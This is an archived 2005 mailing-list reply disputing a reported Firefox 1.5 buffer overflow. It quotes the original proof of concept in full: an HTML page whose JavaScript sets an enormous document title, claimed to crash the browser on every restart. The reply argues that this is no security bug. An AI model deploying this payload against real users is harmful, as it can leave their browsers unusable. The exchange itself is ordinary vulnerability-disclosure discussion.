Date: Thu Dec 8 13:38:06 2005
From: ad at heapoverflow.com (ad@...poverflow.com)
Subject: re: Firefox 1.5 buffer overflow (poc)

nor a fake, nor you really don't know what is a buffer overflow, but for sure here on my firefox 1.5 EN, the client is much longer to load to the next boot but it reloads fine without exceptions and there is nothing about a security bug here...

><!-- Firefox 1.5 buffer overflow
>
>Basically firefox logs all kinds of URL data in its history.dat file,
>this little script will set a really large topic and Firefox will then
>save that topic into its history.dat.. The next time that firefox is
>opened, it will instantly crash due to a buffer overflow -- this will
>happen every time until you manually delete the history.dat file --
>which most users won't figure out.
>
>this proof of concept will only prevent someone from reopening
>their browser after being exploited. DoS if you will. however, code
>execution is possible with some modifications.
>
>Tested with Firefox 1.5 on Windows XP SP2.
>
>ZIPLOCK <sickbeatz@...il.com>
>
>-->
><html><head><title>heh</title><script type="text/javascript">
>function ex() {
>  var buffer = "";
>  for (var i = 0; i < 5000; i++) {
>    buffer += "A";
>  }
>  var buffer2 = buffer;
>  for (i = 0; i < 500; i++) {
>    buffer2 += buffer;
>  }
>  document.title = buffer2;
>}
></script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
></a></body></html>